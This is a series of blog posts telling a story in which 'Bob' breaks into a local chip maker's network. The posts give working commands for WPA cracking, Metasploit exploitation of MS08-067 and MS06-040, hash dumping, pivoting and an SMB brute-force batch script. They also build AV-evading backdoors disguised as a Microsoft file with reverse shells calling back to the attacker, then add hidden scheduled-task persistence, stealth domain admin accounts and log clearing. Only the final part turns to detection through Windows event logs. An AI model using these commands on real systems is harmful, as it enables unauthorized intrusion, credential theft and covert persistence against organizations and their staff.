bobs story
TRANSCRIPT
aturday, October 24, 2009
Bobs Double Penetration Adventure - Part 1
A couple of days ago a mate at work asked about the security issues surrounding computers
that are connected to the company network and also to the Internet via a wifi connection. This
question was perfect fodder for a Bob story I thought. So the story goes.......
Bobs a curious fella and he really likes to explore. Lately he's been learning about hacking,
nothing evil, just really having a look in places that he shouldn't be looking, you know, a
curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking
adventures is Walliford Fries, a chip maker based in his small town. He has nothing against
Wallifords, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are
unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he
can get onto the Walliford network with some if these free hacking tools he's downloaded
from the web and use Wallifords as his new playground.
Bob's not a traditional hacker, he doesn't go to the targets website and spend hours going
through the detail, looking for business relationships, email address, job postings etc.. He
hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop
sporting a brand new install of BackTrack4 and looked at whats about on the Wifi.
That's interesting, here he has a WPA network called WF-IT that is no doubt Walliford Fries
related, After all, his house is within spitting distance of the Walliford offices. Shame its not
WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to
customise his word list for this particular target, so he decides to scrape Wallifords website
and add all those words to his wordlist.
wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/
cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt
cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt
After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need
to create a hash of his wordlist to bruteforce the WPA key he just opts for his small but
popular password list, if this fails he'll have to go for the bigger wordlist he likes to call
"Mother", but first he'll opt for the easy option.
cat WF-customlist >>/root/temp/wordlist.txt
Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs
the necessary BSSIDs of the access point and a client.
airmon-ng start wlan0 11
airodump-ng -c 11 mon0
With the BSSID of the client and the Access Point he starts his capture and saves it to a file.
airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0
With the capture going he sends a few de-auths packets so he can capture the 4 way
handshake, this is critical for him to perform his WPA crack.
aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0
Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file
from the custom wordlist, hopefully all this effort will pay off.
To generate the hash he uses the genpmk tool from the cowpatty directory.
./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT
And to crack the key he uses cowpatty.
./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT
Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor
mode and connecting to the AP.
airmon-ng stop mon0
Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the
wifi network for other hosts.
nmap 192.168.2.0/24 -sP
Got one, well two if you count the Linksys AP but lets focus on the one using the Belkin card
for now. Wondering what ports it has open Bob puts Nmap to good use, again saving the
results to a file.
nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap
Bobs intention is to fire up Nessus and scan his target but first he knows a quick way to check
for a vulnerability that he knows he has a working exploit for.
nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1
Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the conficker
exploit. He can't believe that Walliford still has unpatched PC's for this vulnerability. I guess
the guys from pauldotcom are right. They have a firewall and they have AV so there safe
right? Wrong!
Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might
have some fun with.
Well Nessus confirmed the vulnerability from his Nmap scan which is good but it doesn't
find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.
After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any
exploits that it has against the ports it's found open.
db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe
db_hosts
db_autopwn -p -e -r -t
Oh and time for another crazy dance, Bob gets a session on the remote host and he can see
that he's got system privileges which is always nice. He dumps out the local users hashes for
some John the Ripper fun later and he checks out the route table. Superb, he can see that the
remote host is also connected to the Walliford LAN.
sysinfo
getuid
hashdump
At this point Bob decides at this point to get a little interactive so he pulls up a command
prompt on the compromised host.
execute -H -f cmd.exe -i
He TFTP's a couple of handy dandy files from his laptop and grabs the hashes of any domain
accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these
are going to be quite useful for his exploration adventures in his new playground.
tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe
cachedump.exe
Now he decides to have a little look around on the server. He maps a drive to the IT folder
and attempts to have a poke around.
net view \\server01
net use * \\server01\IT
Damn. The NTFS permissions wont allow him access. Then it dawns on him, the system
account he is using doesn't have permissions on the server. Maybe not but with a hostname
like PC-IT-1 the logged in user probably will have. He comes out of his session lists the
processes and then migrates to a process which is running in the context of the user.
quit
ps
getuid
migrate 784
getuid
Perfect, he's migrated to the Explorer.exe process and now he's now running as James. Bob
launches an interactive shell again and checks his mapped drives.
execute -H -f cmd.exe -i
net use
I:
Brilliant. Bobs got access to the IT folder. From here he can have a good poke around before
he decides his next move. He's got some good old fashioned password cracking to do and
times getting on so Bob decides to call t a day for now.
Saturday, October 31, 2009
Bobs Double Penetration Adventure - Part 2
So Bob decides to revisit his new found playground at Walliford Fries and get to grips with
his new tools. He connects up to the wifi with the password he's already cracked and this time
rather than using the Autopwn feature he decides to try something else. Bob's idea is to use
the PC he exploited previously as a point to launch other attacks deeper into the network.
Bob launches his trusty MS08-067 exploit this time with a meterpreter/reverse_tcp payload
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102
set ExitOnSession False
exploit -j -z
Excellent, Bob gets his session. He connects to the session and checks the network settings
on his compromised host.
sessions -i 1
execute -H -f cmd.exe -i
ipconfig
While he is on the remote host Bob checks a few things, ideally he could do with knowing
about the network servers. At this point he just wants the basics, name & IP.
Net view
And he could do with the IP addresses too. He'll want these for his scans.
ping -n 1 server01
ping -n 1 server02
That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and
creates a route pointing to the internal LAN through his session.
exit
background
route add 10.0.1.0 255.255.255.0 1
route print
Now time to see if the magic works. Bob selects the auxiliary scanner and checks the OS
versions of the two servers on the internal LAN by pivoting through his compromised host.
use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230
run
set RHOSTS 10.0.1.231
run
Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that
through the pivot?
use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
Bugger! No such luck. Hang on though, Bob remembers something he read once. He can use
Mubix's handy dandy deploymsf script to install Metasploit on his compromised host.
Perfect!
He grabs files he needs from the web, putting them into his plugin directory.
cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
And then it's just a case of connecting back to his session on the pwned box, running the
script and pointing it to the metasploit executable.
sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe
Holly crap Batman! look at that. Bob has installed Metasploit on the host he compromised,
thanks to a weak password on the wireless LAN and a missing patch or two.
Now the output isnt always pretty but it gets the job done.
So whats next? Well there is that server with no service pack to take care of. For that Bob
will try his old faithful ms06_040 exploit.
use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this
network for as long as possible so he's going to need to start pulling together some serious
information. He could get this all manually but of course that's pretty dumb, especially when
he can use Dark Operators excellent WinEnum script. This will go out and grab nearly
everything he wants so he acn understand the network better and stick it all in one big text
file so Bob has some bedtime reading. As Bobs already sitting in a meterpreter session he
simply runs the WinEnum script.
run winenum
Sorted. Again it's getting late so Bob decides to call it a day. Before he does though he needs
to leave himself a few backdoors.......which will of course be in the next post.
Tuesday, November 3, 2009
Bob Prepares For Action
Previously in Bob land.......
Bobs back and he's been thinking about his new playground. He's realised that if he's not
careful he'll attract attention and get into trouble, so he needs to lay down some ground-rules
and define some goals before he goes back on the Wallifords network. If he's going to get the
maximum benefit from Wallifords as a training ground rather than a playground he needs to
get serious and stop recklessly throwing exploits at any old box.
Goal 1 To extract as much information about the Walliford Network as possible.
Goal 2 To identify high value targets and gain access to those systems.
Goal 3 To remain undetected.
Goal 4 To generally have fun, learn his tools and practice his techniques.
Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as
many tools that are already on the compromised host as he can. He knows that he needs to
use as many legitimate tools as possible and only upload those that won't be detected by AV.
Getting his tools onto the compromised hosts is important, but uploading them one by one is
a pain in the arse. Then Bob remembers something he heard in a great presentation on post
exploitation from Dean Der Beer, a reference to a tool called Metacab. He takes a look at
Metacab but decides against using it. Bob really likes the idea of Metacab but he wants a
different set of tools so he goes about making his own version. Using the Makecab tool
already in XP he creates a cab file containing the few additional tools he needs, knowing he
can upload and extract the files from the cab with native windows tools from straight from
the command-line.
The one tool he cannot do without is netcat but AV picks it up quite easily. Then Bob
remembers that his Nmap directory has ncat, a new version of netcat with loads of additional
features. Bob runs it through virustotal to see what gives.
Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool
for file transfer, creating proxies and even backdoors. Many of the other tools he decides to
include in the cab file come from the Windows Resource Kit. This means that there is very
little chance of them being detected by AV or looking like Potentially Unwanted
Applications (PUA) on the host.
Tools List
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe
As expected VirusTotal finds nothing wrong with his other tools, but then again why would
it.
So looking at his tools Bob has his ncat for backdoors and file transfer, he has a port scanner,
pmon for keeping an eye on his hosts CPU and memory, tools for extracting anything out of
Active Directory, packet sniffers, SrvInfo which is great for looking at details of servers. He
also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just
encase they had been removed by the Sys Admin. Hopefully he's got everything he needs for
a successful expedition into the Walliford Fries network. If not, he'll go back to the
drawingboard and create a new cab file.
Bob also creates a few bat files that he can use for scanning and password checks. It's easier
to create these now and include them in the cab than it is to write them on the fly.
His first bat file is a simple bruteforce script that will use in-built windows functions to
bruteforce shares. He'll supply a userlist (names.txt) and a common password list (words.txt)
to the bat file. The password list will be common passwords and can be tweaked using the
inbuilt DOS Edit tool when he's on the target, and the userlists will be generated from his
enumeration tool dsquery . After running the bruteforce script any succesfull logins will be
saved to a text file (creds.txt). Bob knows from performing password audits in his other life
that even when complex passwords are enforced users will still pick dumb complex
passwords, such as Password01. And when it comes to change it......well of course were
looking at Password02!
Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip
any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect
attempts in half an hour he'll just try 2 common passwords on all accounts. As they say, slow
and steady wins the race.
Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use
\\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target%
/del)
Bob will use the either net.exe or dsquery.exe to populate his names.txt file. Dsquery is
fantastic for ripping through Active Directory and if you know what your doing you can use
them to pretty much find out anything about users and computers. The beauty is, these tools
can be run from any user account, so you don't need to pop an admins box to get some juicy
info.
The next bat file that bob will include is to check for hosts that respond to a ping and output
the results to a file.
set /P subnet="Enter subnet:"
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply"
Another bat file is created to perform reverse lookups using a nslookup FOR loop.
set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo
%subnet%.%%i
And finally a bat file to use the Portqry tool for port scans against hosts in a host file
(hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.
For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p
tcp
Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.
;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors
.Set MaxCabinetSize=0
.Set MaxDiskSize=0
.Set CabinetNameTemplate=bin.cab
.set DiskDirectoryTemplate=CDROM ;
.Set CompressionType=MSZIP ;
.Set UniqueFiles="OFF"
.Set Cabinet=on
.Set DiskDirectory1=bin bf.bat
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
hosts.txt
names.txt
ncat.exe
net.exe
ngrep.exe
pingsweep.bat
pmon.exe
port-scan.bat
PortQry.exe
reg.exe
rev-lookup.bat
srvinfo.exe
WinDump.exe
words.txt
;*** EOF
And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file is
in the same directory and.....
makecab /F bin.ddf
Perfect, after building his cab file it comes in at less than 1MB, Bob honestly couldn't be
happier. He'll have to use the windows built-in tool called Expand.exe to get his files out of
the cab.
expand /F:* bin.cab .
Right with that done Bob is almost ready to hop onto his target and put his tools to good use
and start his network exploration.
Bob Builds His Custom Payloads - Part 4 .......coming next
uesday, November 17, 2009
Bob The Backdoor Man - Part 1
Previously in Bob Land......
Bob hears on the grapevine that ncat won't work as a single executable. This is a bit of a
bugger and it does give Bob a problem. His intention was to use ncat for file transfers,
proxies and backdoors. It was also pretty useful that it was pretty much undetected by AV.
Luckily for Bob he hears from a good friend that it's quite possible to modify netcat to be
able to bypass anti-virus software. And luckily for Bob, the most talented Muts has created a
video that shows him exactly how to do that here.
This problem also presents Bob with the perfect opportunity to get his hands dirty with some
msfpayload love. He reckons that if he creates a couple of payloads to add into his cab file he
should be able to do everything he needs. And the beauty of using msfpayload is he'll be able
to run them through msfencode to bypass most anti-virus.
Before Bob creates his payloads he grabs a copy of winmsd.exe from his Windows OS. It
doesn't really matter to him what file it is he just wants one that is a Microsoft file. He want
this because all his payloads can take on the characteristics of the file. Rather than going to
great lengths to hide a file, Bobs opinion is that hiding in plain site will probably be better.
Payload 1 For Bobs first payload he wants to create a generic payload that will spawn a command shell
when he connects to it on port 6666.
./msfpayload windows/shell_bind_tcp LPORT=6666 R | ./msfencode -t exe -x
/root/payloads/winmsd.exe -o /root/payloads/winmsd16.exe
Bob has specified a payload that will bind a shell to port 6666. He outputs this in raw format
to the msfencode program that will help avoid detection by anti-virus software. Finally he has
specified that the file is called winmsd16.exe and upon physical inspection it will look just
like the original winmsd.exe file.
After Bob creates the file he tests it out on his XP VM to make sure it works as expected.
Side by side it looks just like the original file, it is identical in size and looks just as through
its a legitimate file from Microsoft.
Bob runs the file and checks he can connect to it with netcat.
nc 10.0.1.10 6666
Payload 2 Bobs second payload will connect back to him when he's on the wireless network and present
him with a meterpreter shell.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=8080 R |
./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd32.exe
Again Bob uses a legitimate file to copy the characteristics from. This time on his host he has
to make sure he has his listener ready on port 8080.
Bob decides that when he creates his listener he'll use msfconsole and pass the following
commands:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z
Bob has configured his listener to accept multiple sessions coming back to him, and the very
useful winenum script developed by Carlos "Dark operator" Perez will run against each
connecting host. All the information from the script will be stored in ~/.msf/logs/ Bob may
well decide to change this at a later date to another script but for now he's very happy.
With his modified netcat and his payloads created and tested Bob rebuilds his cab file and
goes to get his dinner. He knows that during his network exploration adventures he may well
come up against some problems that will cause him to create some payloads on the fly but
he'll deal with that when it happens.
Whilst eating his dinner Bob begins to worry that if the Admins at Walliford Fries patch the
computers he may well lose his way in. By the time Bob has eaten his ice cream desert he has
come up with a few ideas how he might overcome this particular problem.
Coming next....Backdoor Man - Part 2.
Friday, November 20, 2009
Bob The Backdoor Man - Part 2
Previously in Bob Land....
The very next day Bob feels ready to hop back onto his compromised host on the Walliford
Fries LAN and get his back doors planted. He logs into the wireless network with the WPA
key he cracked earlier and he uses the gets a shell on the unpatched PC with the MS08-067
exploit.
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 8181
set RHOST 192.168.2.101
exploit
Bob migrates to a stable process then uploads his backdoors to the Windows\System32
directory using Meterpreters upload function.
migrate 714
lcd /root/payloads
upload winmsd32.exe
upload winmsd16.exe
After Bob lauches a shell he creates a new user and adds it to the Administrators, Power
Users and the Backup Operators groups
shell
net user MS_Support31337 Support31337 /add
net localgroup Administrators MS_Support31337 /add
net localgroup "Backup Operators" MS_Support31337 /add
net localgroup "Power Users" MS_Support31337 /add
He choose these privileged groups as a group policy may be configured to control the local
Administrators group and by remaining in the other groups he will still have a high level of
access.
Now Bob wants to get down to business and plant some of these lovely backdoors he's
created. Bobs first port of call is to create a registry entry to run his meterpreter payload and
connect back to Bob each time the computer is booted.
reg add
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v
"Microsoft winmsd32" /d "C:\Windows\System32\winmsd32.exe"
Bob check that his registry entry has been set using the reg query command.
reg query
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Then it occurs to Bob that someone may well stumble across his registry entry and remove it
so he decides to have a backup by creating some scheduled tasks. One task (the meterpeter
reverse connect) will run every 10 minutes and the other (the listening shell) will run at
startup.
schtasks /create /tn "Winmsd32" /tr C:\Windows\System32\winmsd32.exe /sc minute /mo 10
/RU "NT AUTHORITY\SYSTEM"
schtasks /create /tn "Winmsd16" /tr C:\Windows\System32\winmsd16.exe /sc onstart /RU
"NT AUTHORITY\SYSTEM"
Now the only way the normal logged in user would see these Scheduled Tasks is by looking
at the directory using a command prompt. Only an Administrator running schtasks on the PC
would see these scheduled tasks, anyone else will see nothing. Even looking at the
C:\Windows\Tasks folder through explorer wouldn't show the tasks as it will only show the
current users tasks.
Bobs pretty happy about this but what would make him happier would be if it was really
really hard to see his backdoors. Then it occurs to him that by changing the attributes on the
jobs in the tasks folder it would be really really hard as the user would have to do a "dir /a:h
*.*" on the directory specifically. Okay, so thats not really really hard but it is a bit of a
bugger!
cd \windows\tasks
Attrib +H winmsd*.job
Then Bob checks his handy work by looking at just hidden files.
Great, Bob fires up another instance of msfconsole and sets up his handler for the sessions
that should start coming in.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z
Within a minute or 2 Bob gets a session from his scheduled task backdoor.
What he really likes about these scheduled tasks is he wont get loads of sessions back from
the same host, but if he looses connection he'll get another session back 10 minutes later.
Also, every now and then Bob can change the AutoRunScript so Metasploit can gather all
sorts of useful information on his behalf.
Now Bob is in, he has his backdoors sorted and he wants to have a look around to see what
else might be interesting. Bob has a knows a guy who works for Wallifords. Now this guys is
a bit of a dick and is always boasting about how much he earns. Bobs sure the guy
exaggerates, wouldn't it be nice if Bob could access the payroll data and see if this guy is
telling the truth?
Oh, look at that, lunch time. Bob goes and gets his dinner and has a think about what other
interesting things he might be able to find on the Walliford network.
Coming next.......Bob gets to know his new friends!
Tuesday, January 19, 2010
What Bob Did. What Alice Saw - Part 1
Recently I've been have way to much fun looking at event logs and digging out which events
are indicators of a compromise. As is typical for me I'll try to wrap some of that knowledge
up into a little Bob story. So here goes.
Part 1 - What Bob did.
Bob has been up to his old tricks again and has found himself on the wrong side of someones
firewall. Well maybe not the wrong side as far as Bob is concerned but it certainly is for
Alice, our Systems Administrator. Bob being Bob decides to start his day with a little
pwnage, he hunts around for a target and after a little scanning decides to go with a wide
open domain controller which he likes to call 10.0.1.233, or as Alice would call it, Server04.
Bob, sporting his brand new installation of BackTrack4 , decides to test drive the fantastic
Fast-Track scripts. He uses Fast-Track not because he's lazy or can't be bothered to learn
Metasploit, but because he only has a few minutes before work and he needs to get his
pwnage on pretty sharpish.
After successfully getting his Meterpreter session Bob uses the shell command to drop down
to a Command prompt. Once at the prompt he decides to list the users on the domain.
net user /domain
The resulting list is quite long and split into 3 columns, as Bob intends to extract the user list
to use in future scripts he decides to make use of the DSQUERY command to give him the
list in a nice single line list.
dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr
samaccountname
With that done Bob decides to go ahead and quickly create a couple of accounts. He wants to
create 2 accounts, one as a user because after all thats where the data is right. The other
account will be an administrative user because that will help him get to other interesting
places on the network. Another good reason for having 2 accounts is if Wallifords discover
his intrusion they'll likely try to identify the intruders user account and may well stop when
they find the first one. Cunning eh!
Now in the past Bob has used "Net User username password /add" to do this, but that will
create an account that even the crappiest of admins will spot. What Bob needs to do is create
an account that blends in with the rest of the user accounts, to do this he takes a look at a few
user accounts that already exist to see what account properties are populated as standard.
dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=jimm))" -
limit 0 -attr *
From here Bob can see that the user Jim Morrison has a Title, Office, Display Name,
telephone Number and Home Drive fields neatly populated as do many of the other users.
Armed with that knowledge Bob creates an account with DSADD that will sit nicely with the
other accounts in the same Organisational Unit.
dsadd user "CN=Bob Ball,OU=Internal,DC=walliford,DC=local" -Samid BobB -Pwd
Eviluser123 -fn Bob -Ln Ball -Display "Bob Ball" -Office Leeds -Tel "01233 455779" -Dept
HR -hmdir \\wal-filer\users\BobB -Title Manager -upn [email protected]
Bob checks his handy work before he moves onto his next task.
dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=BobB))" -
limit 0 -attr *
Now Bob wants to give this user account access to some data, and that will be done by
making Bob a member of some groups.
dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr
Name
So there is the list of groups but lets take a closer look at the HR one first.
dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr *
Okay that'll do. Bob just needs to modify the properties with DSMOD to add his user account
as a member.
dsmod group "CN=HR,OU=Internal,DC=walliford,DC=local" -addmbr "CN=Bob
Ball,OU=Internal,DC=walliford,DC=local"
With that sorted Bob wants to create his admin user. hmmm something that wont stand out
again. He models the account of other built-in accounts and sets his password to never expire.
Hopefully this won't raise any eyebrows.
dsadd user "CN=Cert Owner,CN=Users,DC=walliford,DC=local" -Samid CertOwner -Pwd
EvilAdmin123 -Desc "Built-in account for administering certificates" -Display "Domain
Certificate Owner" -pwdneverexpires yes
Brilliant. No need to go to town on the groups again. This time he's adding the account
straight into Domain Admins.
net group "Domain Admins" CertOwner /add
With that done Bob decides he really needs to get off to work.
Whilst Bobs at work he's slightly troubled that he may have left traces in the logs on the
server he compromised. As soon as he gets home he hops back onto the network and just for
fun connect through RDP to the server to test his account.
Works like a charm. He has a quick look around and logs off the RDP session. Then Bob
remembers what he was supposed to be doing. He gets a new Meterpreter session up and
issues the command to clear the logs
clearev
All sorted. Now it's dinner time, pie and chips tonight.
Friday, January 29, 2010
What Bob Did. What Alice Saw - Part 2
This is the 2nd part of the story which is all about Bob the evil hacker and Alice the
overworked Sys Admin.
In the previous post Bob was using some of his command line Kung Fu to carefully analyse
the Walliford Active Directory before creating some very inconspicuous admin and user
accounts. Bob being the careful kind of guy that he is also attempted to cover his tracks by
deleting the logs on the victim server.
In this post I'll be looking at how Alice might have spotted all Bobs actions if she was
following 2 best practices:
1) Analysing the logs.
2) Logging to another server.
Part 2 - What Alice Saw
Alice turns up at the office a few minutes early as usual. She likes to get in, grab her coffee
and then start on her daily tasks. First she checks her emails for anything urgent, then the
helpdesk, and finally she gets to her server logs. The information that windows logs can be
pretty overwhelming, luckily Alice has a few filters that she can apply to look for key events.
What Alice ideally wants to know is what accounts have been added or deleted and what
groups have been modified. She keeps a list of the events that she needs to watch out for to
spot these types of activities. Other interesting events that Alice keeps a close eye on are
those for people logging into servers, bad passwords and account lockouts.
Her daily log analysis isn't her favorite job, but it's an important one. She would love to get
her boss to pay for a tool to do the log correlation but unfortunately he doesn't see it as an
important enough task. As soon as Alice finds the time and starts looking through the logs
she starts to worry. She see's a whole bunch of login failures from earlier that morning.
On closer inspection Alice sees some very strange looking account names like metasploit.
After those entries Alice sees an event 624 Which indicates a new account has been created
for a user called Bob Ball.
Alice checks the helpdesk to see if a call was raised for a new employee called Bobby Ball, it
wasn't.
Next Alice can see an event 632 that shows that the new account has been added to the HR
group.
She makes a quick call to HR and finds that they know nothing of this mysterious account.
Alice disables the account until she can get to the bottom of what's going on.
Just as Alice finds a few minutes to spare she goes back to her logs and then her phone rings.
As she's summoned to a project meeting she thinks that the logs will have to wait.
Unfortunately the meeting takes up the rest of her day.
The next day Alice gets to the office extra early so she can catch up with her tasks. However,
on connecting to her server she finds the logs are almost completely empty. All the entries
from the previous day had been cleared. The oldest event is a event 517 which shows that the
logs have been cleared.
As Alice sits back and thinks about things she convinced that some evil hacker has tried to
break into her network, she counts her lucky stars that she spotted the hackers account and
disabled it quickly before any damage was done.
The End
Okay, I know my story is pretty crap but I bring all this log stuff up because had recently had
a conversation with someone who didn't realise just how much useful information was
contained in the Windows security event logs. This post is just really to highlight 2 things.
Get your logs off the server, there are plenty of great tools to do that, unfortunately they all
cot a bit. Secondly, build time into your day to analyse the logs. Find out the important events
and find a way to filter the logs to spot when something is wrong.
If you want to learn more about the Windows Event Logs check out Randy Franklin Smiths
site Ulitimate Windows Security. His site is without doubt the best resource for learning
about the windows security logs I have ever found, and his webcasts are pretty amazing.